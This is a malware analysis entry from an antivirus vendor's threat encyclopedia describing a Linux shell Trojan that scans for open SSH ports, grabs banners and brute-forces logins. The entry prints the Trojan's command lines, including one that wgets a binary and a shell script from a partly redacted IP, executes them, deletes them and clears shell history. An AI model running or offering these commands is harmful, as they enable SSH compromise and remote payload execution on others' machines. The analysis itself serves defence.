Analysis by: Joshua Paul Ignacio
ALIASES:

N/A

 PLATFORM:

Linux/Unix

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Canal de infección Downloaded from the Internet, Dropped by other malware

This Trojan may be downloaded by other malware/grayware from remote sites.

  TECHNICAL DETAILS

Tamaño del archivo 1,226 bytes
Tipo de archivo Other
Residente en memoria No
Fecha de recepción de las muestras iniciales 20 May 2020
Carga útil Deletes files, Downloads files, Terminates processes, Connects to URLs/IPs, Executes files

Arrival Details

This Trojan may be downloaded by the following malware/grayware from remote sites:

Installation

This Trojan drops the following files:

  • /{Malware Path}/motd
  • /{Malware Path}/shitscanner → Detected as HackingTools_Shark
    • A scanner that will search for hosts in the internet with an open Port 22.
    • The results will be stored in bios.txt
    • It accepts the following parameters:
      • Port Number
      • -a or -b (class)
        • -a (A network) must be between 1 and 254
        • -b (B network) example: 192.168
      • -i (interface)
      • -s (speed)
  • /{Malware Path}/boner → Detected as HackTool.Linux.BANGRAB.A
    • Grabs the banner of the IP addresses indicated in the "infile" paramater
    • The results will be stored in banner.log
    • The contents of banner.log will then be filtered by listing IP addresses of machines with OpenSSH running on Port 22.
    • The filtered list will be stored on mfu.txt
    • It accepts the following parameters:
      • infile - a text file that contains IP addresses
      • port
      • threads - concurrent IPs being scanned
  • /{Malware Path}/brute → Detected as HackTool.Linux.SSHBRUTE.GA
    • a Haiduc scanner
    • It will use the following as arguments to connect, download and execute files to gain control over its target:
    • Successfully compromised machines will be saved in gasite.txt

Other System Modifications

This Trojan deletes the following files:

  • /{Malware Path}/bios.txt
  • /{Malware Path}/mfu.txt
  • /{Malware Path}/banner.log

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

  • shitscanner
  • boner

Other Details

This Trojan does the following:

  • It executes the dropped files with the following paramaters:
    • timeout $timeout ./{Malware Path}/shitscanner $port -i $interface -s $speed
      • where:
        • $timeout - 130
        • $port - 22
        • $interface - eth0
        • $speed - 10
    • ./{Malware Path}/boner bios.txt 22 3500
    • ./{Malware Path}/brute 9999 -f mfu.txt pass_file 22 "wget http://{BLOCKED}.{BLOCKED}.17.186/AB4g5/kiga.x86 ;chmod 777 *; ./kiga.x86 ROOTS; rm -rf kiga*;wget http://{BLOCKED}.{BLOCKED}.17.186/kit.sh ;sh kit.sh; history -c"
      • where:
        • pass_file - list of credentials stored

  SOLUTION

Motor de exploración mínimo 9.850
Primer archivo de patrones de VSAPI 15.882.02
Primera fecha de publicación de patrones de VSAPI 20 May 2020
Versión de patrones OPR de VSAPI 15.883.00
Fecha de publicación de patrones OPR de VSAPI 21 May 2020

Scan your computer with your Trend Micro product to delete files detected as Trojan.SH.ETIN.B. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.